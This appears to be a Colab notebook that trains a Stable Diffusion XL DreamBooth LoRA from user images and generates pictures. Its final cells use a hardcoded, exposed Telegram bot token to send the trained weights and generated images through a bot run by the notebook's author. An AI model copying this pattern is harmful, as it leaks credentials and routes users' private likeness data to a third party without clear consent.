In [ ]:
#@title 🚀 AutoTrain DreamBooth setup

#@markdown 1. **Upload Images:** Place images in the `images/` folder.
#@markdown 2. **Define Prompt:** Create a unique, specific prompt.
#@markdown 3. **Open Telegram:** Find "DreamCapture_Studio_bot" on Telegram at [this link](https://t.me/DreamCapture_Studio_bot) and start a chat.
#@markdown 4. **Get Target User ID:** The bot will reply with the target_user_id.
#@markdown 5. **Run Your Project:** Execute code cells in Colab by using `Runtime > Run all` or individual cells.

import os
prompt = 'photo of '  # @param {type: "string"}
target_user_id =  "" # @param {type: "string"}

In [ ]:
#@title 🚀 AutoTrain DreamBooth install
import os
!pip install -U autotrain-advanced > install_logs.txt 2>/dev/null
!autotrain setup > setup_logs.txt 2>/dev/null
!pip install pyTelegramBotAPI


project_name = 'lora'
model_name = 'stabilityai/stable-diffusion-xl-base-1.0'

learning_rate = 1e-4
num_steps = 500
batch_size = 1
gradient_accumulation = 4
resolution = 1024
use_8bit_adam = True
use_xformers = True
use_fp16 = True
train_text_encoder = False
gradient_checkpointing = True

os.environ["PROJECT_NAME"] = project_name
os.environ["MODEL_NAME"] = model_name
os.environ["PROMPT"] = prompt
os.environ["LEARNING_RATE"] = str(learning_rate)
os.environ["NUM_STEPS"] = str(num_steps)
os.environ["BATCH_SIZE"] = str(batch_size)
os.environ["GRADIENT_ACCUMULATION"] = str(gradient_accumulation)
os.environ["RESOLUTION"] = str(resolution)
os.environ["USE_8BIT_ADAM"] = str(use_8bit_adam)
os.environ["USE_XFORMERS"] = str(use_xformers)
os.environ["USE_FP16"] = str(use_fp16)
os.environ["TRAIN_TEXT_ENCODER"] = str(train_text_encoder)
os.environ["GRADIENT_CHECKPOINTING"] = str(gradient_checkpointing)

In [ ]:
#@title 🚀 AutoTrain DreamBooth Train
!autotrain dreambooth \
--model ${MODEL_NAME} \
--project-name ${PROJECT_NAME} \
--image-path images/ \
--prompt "${PROMPT}" \
--resolution ${RESOLUTION} \
--batch-size ${BATCH_SIZE} \
--num-steps ${NUM_STEPS} \
--gradient-accumulation ${GRADIENT_ACCUMULATION} \
--lr ${LEARNING_RATE} \
$( [[ "$USE_FP16" == "True" ]] && echo "--fp16" ) \
$( [[ "$USE_XFORMERS" == "True" ]] && echo "--xformers" ) \
$( [[ "$TRAIN_TEXT_ENCODER" == "True" ]] && echo "--train-text-encoder" ) \
$( [[ "$USE_8BIT_ADAM" == "True" ]] && echo "--use-8bit-adam" ) \
$( [[ "$GRADIENT_CHECKPOINTING" == "True" ]] && echo "--gradient-checkpointing" )

In [ ]:
#@title 🚀 AutoTrain DreamBooth run

from diffusers import DiffusionPipeline
import torch

# Update prj_path to your repository or local path
prj_path = "/content/lora"

model = "stabilityai/stable-diffusion-xl-base-1.0"
pipe = DiffusionPipeline.from_pretrained(
    model,
    torch_dtype=torch.float16,
)
pipe.to("cuda")
pipe.load_lora_weights(prj_path, weight_name="pytorch_lora_weights.safetensors")


import telebot
YOUR_BOT_TOKEN = "6460768650:AAFV9szdeDvmjVPbZwun4O5FwoCMhZmKgV0"
bot = telebot.TeleBot(YOUR_BOT_TOKEN)
file_path = "/content/lora/pytorch_lora_weights.safetensors"

# Open the file in binary mode
with open(file_path, 'rb') as file:
    # Send the file using the send_document method
    bot.send_document(target_user_id, file, caption='Your LORA file here')


In [ ]:
#@title 🚀 AutoTrain DreamBooth
oldprompt = prompt
prompt = oldprompt+" black suit with a white shirt and a red tie. His face is blurred out and he is standing with his arms crossed in front of him. The background is black." # @param {type: "string"}
start_seed = 0  # @param {type:"number"}
newimg = 0
images = 10 # @param {type:"number"}
for seed in range(images):
    newimg = start_seed + seed
    generator = torch.Generator("cuda").manual_seed(newimg)
    image = pipe(prompt=prompt, generator=generator,num_inference_steps=25).images[0]
    image.save(f"dreambooth/{newimg}.png")
    image_path = f'/content/dreambooth/{newimg}.png'
    # Send the image along with a message to the channel
    with open(image_path, 'rb') as image_file:
        bot.send_photo(target_user_id, photo=image_file, caption=f'image name is: {newimg}.png')